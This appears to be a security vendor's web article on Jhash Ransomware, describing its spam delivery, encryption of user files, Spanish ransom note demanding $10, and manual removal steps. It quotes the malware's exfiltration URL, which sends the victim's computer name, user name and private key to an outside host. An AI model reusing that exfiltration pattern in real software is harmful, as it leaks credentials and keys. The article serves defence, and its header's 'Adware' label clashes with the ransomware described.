1 of 3
Danger level 7
Type: Adware
Common infection symptoms:
  • Can't be uninstalled via Control Panel
  • Installs itself without permissions
  • Connects to the internet without permission
  • System crashes
  • Slow Computer

Jhash Ransomware

Every now and again, a new threat created using the Hidden Tear open source code emerges, and the latest one to be discovered is Jhash Ransomware. This malicious threat joins the ranks of such well-known threats as Onion3Cry Ransomware, FlatChestWare Ransomware, and Explorer Ransomware. Just like most other threats from the family, this threat is spread using the backdoor within spam emails. The launcher is concealed, and the user is tricked into opening it themselves. The threat is executed silently so as not to alarm the user and make them delete the infection before it has the chance to do anything. Right away, it checks to see if Internet connection is available, and if it is, it sends information about the victim to https://app-1509153828.000webhostapp.com/write.php?computer_name={Victim Computer name}&userName={User name}&password={Private encryption key}&allow=ransom. The private encryption key is created during the encryption process, and you need it to make the decryption of files possible. Unfortunately, you cannot decrypt files by removing Jhash Ransomware.

When Jhash Ransomware invades the operating system, it immediately copies itself as “local.exe” to the %HOMEDRIVE%\[user]\Rand123\ directory. During the encryption, the threat targets data within the folders of the %USERPROFILE% directory, including Desktop, Documents, Downloads, and Pictures. According to our research, the threat specifically targets files with such extensions as .txt, .exe, .doc, .jpg, .gif, .wmv, .avi, .rar, and .7-zip. The files that are encrypted gain the “.locky” extension, which, naturally, should help you identify the corrupted files faster. Once the encryption is complete, Jhash Ransomware should download a file from imgur.com to the %HOMEDRIVE%[user]\ directory. This file should be renamed to “ransom.jpg” and then set as the Desktop background image. This image file shows a text message that informs about the encryption of files. Besides that, the ransomware creates two TXT files called “READ_IT.txt” and “Leeme_Nota_de_Rescate.txt” on the Desktop. The first file, for whatever reason, gets encrypted, and so you can delete it right away. The second file provides us with more information. Both the TXT file and the wallpaper display text in Spanish, which reveals the target.

According to the ransom note in the TXT file, the creator of Jhash Ransomware wants you to send a ransom of 10 US Dollars using PAYZA – an online payment platform – to jhash.bancaenlinea@zoho.com. They also want you to prove the transaction by sending a screenshot to the same email address. It is suggested that only after these steps are completed, the steps showing how to decrypt files will be revealed. Although 10 USD is not a lot, we have to warn you that you might end up wasting this money for no reason at all. If you believe that cyber criminals would keep their promises just because you fulfill their demands, you are inexperienced. The researchers in our team have lots of experience when it comes to file-encrypting threats, and we know that if files are encrypted, that is unlikely to change. Does that mean that you should just remove files encrypted by Jhash Ransomware? You can store them in a folder for a day when a decryptor becomes publicly available, but that is not something you can count on either. What you can count on is that you will be much safer if you delete existing threats.

Can you delete Jhash Ransomware manually? That might be very easy to do, but you should consider using anti-malware software anyway. The instructions below provide you with a simple way to erase the devious threat yourself, but only reliable anti-malware software can make sure that your operating system is cleaned and protected at all times. It can automatically remove Jhash Ransomware and any other infection that is present. Obviously, if you decide that you want to handle the situation yourself, you will need to scan your vulnerable operating system afterward just to make sure that it is completely clean. If that is the route you are taking, make sure that the malware scanner you employ is trustworthy and up-to-date. Once you take care of that, you should also take care of your personal files. Hopefully, they are backed up already, and the ransomware has not affected you in any way. If files were not backed up, and now are lost, set up a trustworthy backup system to keep your files safe in the future.

Jhash Ransomware Removal

  1. Simultaneously tap Ctrl+Shift+Esc to launch the Task Manager.
  2. Click the Process tab and check for malicious processes. If any are found, click End process.
  3. Simultaneously tap Win+E to launch Windows Explorer.
  4. Enter %HOMEDRIVE% into the bar at the top.
  5. Open the [user name] folder.
  6. Right-click and Delete the subfolder named Rand123.
  7. Right-click and Delete the file named ransom.jpg.
  8. Move to the Desktop and then Delete these files:
    • Leeme_Nota_de_Rescate.txt
    • READ_IT.txt.locky
  9. Empty Recycle Bin and then install a trusted malware scanner to inspect your operating system.
Download Spyware Removal Tool to Remove* Jhash Ransomware
  • Quick & tested solution for Jhash Ransomware removal.
  • 100% Free Scan for Windows

Post comment — WE NEED YOUR OPINION!

Please enter security code:
This is a captcha-picture. It is used to prevent mass-access by robots.